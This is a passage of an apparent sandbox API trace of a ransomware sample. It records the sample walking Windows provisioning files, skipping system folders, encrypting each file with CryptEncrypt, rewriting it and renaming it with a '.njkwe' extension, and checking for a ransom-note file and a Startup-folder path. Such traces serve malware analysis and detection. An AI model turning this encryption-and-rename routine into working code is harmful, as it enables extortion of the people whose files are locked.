[0081.177] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.177] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.177] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.177] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.177] CloseHandle (hObject=0x43c) returned 1 [0081.177] GetProcessHeap () returned 0xbe0000 [0081.177] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.177] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\485__Connections_Cellular_AT&T (United States)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 184 [0081.177] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\485__Connections_Cellular_AT&T (United States)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\485__connections_cellular_at&t (united states)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\485__Connections_Cellular_AT&T (United States)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\485__connections_cellular_at&t (united states)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.178] GetProcessHeap () returned 0xbe0000 [0081.178] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.178] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9117b5eb, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9117b5eb, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9117b5eb, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2cf, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="486__Connections_Cellular_AT&T (United States)_i1$(__MVID)@WAP.provxml", cAlternateFileName="486__C~1.PRO")) returned 1 [0081.178] lstrcmpiW (lpString1="486__Connections_Cellular_AT&T (United States)_i1$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.178] lstrcmpiW (lpString1="486__Connections_Cellular_AT&T (United States)_i1$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.178] lstrcmpiW (lpString1="486__Connections_Cellular_AT&T (United States)_i1$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.178] lstrcmpiW (lpString1="486__Connections_Cellular_AT&T (United States)_i1$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.178] lstrcmpiW (lpString1="486__Connections_Cellular_AT&T (United States)_i1$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.178] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\486__Connections_Cellular_AT&T (United States)_i1$(__MVID)@WAP.provxml") returned 164 [0081.178] StrStrIW (lpFirst="486__Connections_Cellular_AT&T (United States)_i1$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.178] lstrcmpW (lpString1="486__Connections_Cellular_AT&T (United States)_i1$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.178] lstrcmpW (lpString1="486__Connections_Cellular_AT&T (United States)_i1$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.178] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\486__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.178] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\486__Connections_Cellular_AT&T (United States)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\486__connections_cellular_at&t (united states)_i1$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.179] GetTickCount () returned 0x11549b7 [0081.179] GetTickCount () returned 0x11549b7 [0081.179] GetTickCount () returned 0x11549b7 [0081.179] GetTickCount () returned 0x11549b7 [0081.179] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.179] GetProcessHeap () returned 0xbe0000 [0081.179] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0081.179] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2cf, lpOverlapped=0x0) returned 1 [0081.180] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.180] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2cf, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2cf, lpOverlapped=0x0) returned 1 [0081.181] GetProcessHeap () returned 0xbe0000 [0081.181] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0081.181] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.181] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.181] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.181] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.181] CloseHandle (hObject=0x43c) returned 1 [0081.181] GetProcessHeap () returned 0xbe0000 [0081.181] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.181] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\486__Connections_Cellular_AT&T (United States)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 184 [0081.181] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\486__Connections_Cellular_AT&T (United States)_i1$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\486__connections_cellular_at&t (united states)_i1$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\486__Connections_Cellular_AT&T (United States)_i1$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\486__connections_cellular_at&t (united states)_i1$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.182] GetProcessHeap () returned 0xbe0000 [0081.182] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.182] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9117b5eb, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9117b5eb, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9117b5eb, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2ce, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="487__Connections_Cellular_AT&T (United States)_i2$(__MVID)@WAP.provxml", cAlternateFileName="487__C~1.PRO")) returned 1 [0081.182] lstrcmpiW (lpString1="487__Connections_Cellular_AT&T (United States)_i2$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0081.182] lstrcmpiW (lpString1="487__Connections_Cellular_AT&T (United States)_i2$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0081.182] lstrcmpiW (lpString1="487__Connections_Cellular_AT&T (United States)_i2$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0081.182] lstrcmpiW (lpString1="487__Connections_Cellular_AT&T (United States)_i2$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0081.182] lstrcmpiW (lpString1="487__Connections_Cellular_AT&T (United States)_i2$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0081.182] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\487__Connections_Cellular_AT&T (United States)_i2$(__MVID)@WAP.provxml") returned 164 [0081.182] StrStrIW (lpFirst="487__Connections_Cellular_AT&T (United States)_i2$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0081.182] lstrcmpW (lpString1="487__Connections_Cellular_AT&T (United States)_i2$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.182] lstrcmpW (lpString1="487__Connections_Cellular_AT&T (United States)_i2$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0081.182] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\487__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.182] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\487__Connections_Cellular_AT&T (United States)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\487__connections_cellular_at&t (united states)_i2$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.183] GetTickCount () returned 0x11549b7 [0081.183] GetTickCount () returned 0x11549b7 [0081.183] GetTickCount () returned 0x11549b7 [0081.183] GetTickCount () returned 0x11549b7 [0081.183] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.183] GetProcessHeap () returned 0xbe0000 [0081.183] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0081.183] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x2ce, lpOverlapped=0x0) returned 1 [0081.184] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd32, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.184] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x2ce, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x2ce, lpOverlapped=0x0) returned 1 [0081.184] GetProcessHeap () returned 0xbe0000 [0081.184] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0081.185] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.185] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.185] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.185] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.185] CloseHandle (hObject=0x43c) returned 1 [0081.185] GetProcessHeap () returned 0xbe0000 [0081.185] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.185] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\487__Connections_Cellular_AT&T (United States)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 184 [0081.185] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\487__Connections_Cellular_AT&T (United States)_i2$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\487__connections_cellular_at&t (united states)_i2$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\487__Connections_Cellular_AT&T (United States)_i2$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\487__connections_cellular_at&t (united states)_i2$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.186] GetProcessHeap () returned 0xbe0000 [0081.186] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.186] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9117b5eb, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9117b5eb, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9117b5eb, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1e4, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="488__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", cAlternateFileName="488__C~1.PRO")) returned 1 [0081.186] lstrcmpiW (lpString1="488__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Windows") returned -1 [0081.186] lstrcmpiW (lpString1="488__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="$Recycle.bin") returned 1 [0081.186] lstrcmpiW (lpString1="488__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="System Volume Information") returned -1 [0081.186] lstrcmpiW (lpString1="488__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Program Files") returned -1 [0081.186] lstrcmpiW (lpString1="488__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Program Files (x86)") returned -1 [0081.186] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\488__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml") returned 162 [0081.186] StrStrIW (lpFirst="488__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpSrch=".njkwe") returned 0x0 [0081.186] lstrcmpW (lpString1="488__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.186] lstrcmpW (lpString1="488__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="taridd") returned -1 [0081.186] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\488__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.186] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\488__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\488__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.187] GetTickCount () returned 0x11549b7 [0081.187] GetTickCount () returned 0x11549b7 [0081.187] GetTickCount () returned 0x11549b7 [0081.187] GetTickCount () returned 0x11549b7 [0081.187] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.187] GetProcessHeap () returned 0xbe0000 [0081.187] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0081.187] ReadFile (in: hFile=0x43c, lpBuffer=0xc52870, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesRead=0x380edc4*=0x1e4, lpOverlapped=0x0) returned 1 [0081.191] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe1c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.191] WriteFile (in: hFile=0x43c, lpBuffer=0xc52870*, nNumberOfBytesToWrite=0x1e4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc52870*, lpNumberOfBytesWritten=0x380edc4*=0x1e4, lpOverlapped=0x0) returned 1 [0081.191] GetProcessHeap () returned 0xbe0000 [0081.191] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc52870 | out: hHeap=0xbe0000) returned 1 [0081.191] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.191] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0081.191] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0081.191] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0081.191] CloseHandle (hObject=0x43c) returned 1 [0081.191] GetProcessHeap () returned 0xbe0000 [0081.191] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0081.191] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\488__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml_r00t_{3sXlE5}.njkwe") returned 182 [0081.191] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\488__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\488__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\488__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\488__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0081.192] GetProcessHeap () returned 0xbe0000 [0081.192] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0081.192] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x911a1852, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x911a1852, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x911a1852, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1d9, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="489__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", cAlternateFileName="489__C~1.PRO")) returned 1 [0081.192] lstrcmpiW (lpString1="489__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Windows") returned -1 [0081.192] lstrcmpiW (lpString1="489__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="$Recycle.bin") returned 1 [0081.192] lstrcmpiW (lpString1="489__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="System Volume Information") returned -1 [0081.192] lstrcmpiW (lpString1="489__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files") returned -1 [0081.192] lstrcmpiW (lpString1="489__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="Program Files (x86)") returned -1 [0081.192] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\489__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml") returned 147 [0081.192] StrStrIW (lpFirst="489__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpSrch=".njkwe") returned 0x0 [0081.192] lstrcmpW (lpString1="489__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.192] lstrcmpW (lpString1="489__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml", lpString2="taridd") returned -1 [0081.192] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\489__Cellular", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0081.192] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\489__Cellular_PerSimSettings_$(__ICCID)_AppID.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\489__cellular_persimsettings_$(__iccid)_appid.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0081.193] GetTickCount () returned 0x11549c7 [0081.193] GetTickCount () returned 0x11549c7 [0081.193] GetTickCount () returned 0x11549c7 [0081.193] GetTickCount () returned 0x11549c7 [0081.193] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0081.193] GetProcessHeap () returned 0xbe0000 [0081.193] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc52870 [0081.193] ReadFile (in: 